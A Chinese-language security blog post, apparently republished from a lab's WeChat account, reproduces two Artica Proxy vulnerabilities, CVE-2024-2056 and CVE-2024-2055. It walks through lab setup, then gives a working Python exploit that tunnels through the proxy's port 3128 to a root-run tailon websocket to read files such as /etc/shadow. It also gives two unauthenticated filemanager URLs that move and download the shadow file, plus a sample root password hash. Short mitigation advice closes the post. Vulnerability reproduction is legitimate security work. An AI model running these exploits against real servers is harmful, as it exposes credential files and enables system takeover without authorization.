前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >号称10w基础服务的Artica代理服务器最新CVE复现

号称10w基础服务的Artica代理服务器最新CVE复现

作者头像
Ms08067安全实验室
发布2024-03-22 17:50:48
930
发布2024-03-22 17:50:48
举报

作者:皮卡丘

Artica Proxy 是一款网络代理和安全网关解决方案,它提供了一系列功能来保护用户在访问互联网资源时的安全,在全球说部署了10w服务

在最新版本4.50中存在cve-2024-2056,运行并绑定到Artica Proxy 4.50版环回接口的服务可通过代理服务访问。特别地,tailon服务作为root用户运行,绑定到环回接口,并且在TCP端口7050上侦听。使用tailon服务,可以查看Artica Proxy上任何文件的内容

默认开启http代理以后,可以通过代理的端口直接访问内部的7050端口

可以直接访问/etc/shadow,等敏感信息泄露造成不必要的损失

比如hash泄露

代码语言:javascript
复制
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::

如果是官网默认下载VMWARE,没有改密码还存在弱口令

下载以后安装启动Artica,配置本地虚拟机

配置本地网络

修改dns

修改服务器地址为你本地地址

成功以后web端口访问9000

进入web页面进行配置

选择代理服务

设置账号密码

进行端口扫描

发现3128端口,测试poc

代码语言:javascript
复制
import reimport sysimport jsonimport websocketARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '127.0.0.1'FILE_TO_READ    = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd'WEBSOCKET_URI   = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'payload = {'command':'sed''script': f'r {FILE_TO_READ}', 'entry': {'path':   '/var/log/squid/access.log','alias':  'Proxy/access.log',},'nlines': 1}websocket_message = json.dumps([json.dumps(payload)])ws = websocket.WebSocket()ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='3128', proxy_type='http')ws.send(websocket_message)reading = Truewhile reading:data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())if data: print(data.group(1))ws.close()

这段代码意思是我们访问http代理,然后通过代理去访问服务器内部的127.0.0.1的7050端口

因为tailon默认开启同时还是root权限,所以可以读取比如/etc/shadow等敏感信息

用法:Python3 exploit ip /etc/shadow

这就是cve-2024-2056目前官方还没有出台修复方案

建议缓解措施:降低tailon权限或者临时关闭

Cve-2024-2055

Artica Proxy版本4.40和4.50的Rich Filemanager功能为文件管理功能提供了一个基于web的界面。启用该功能后,默认情况下不需要身份验证,而是以根用户身份运行。这为未经身份验证的攻击者提供了对文件系统的完全访问权限

开启rich服务

扫描发现5000端口

执行命令

代码语言:javascript
复制
http://ip:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'

读取/tmp/shadow

代码语言:javascript
复制
http://ip:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'

修复建议:

目前只能先禁止停用Rich Filemanager服务

参考资料:

代码语言:javascript
复制
https://github.com/advisories/GHSA-rfmj-78j3-h4xf
本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2024-03-19,如有侵权请联系?cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com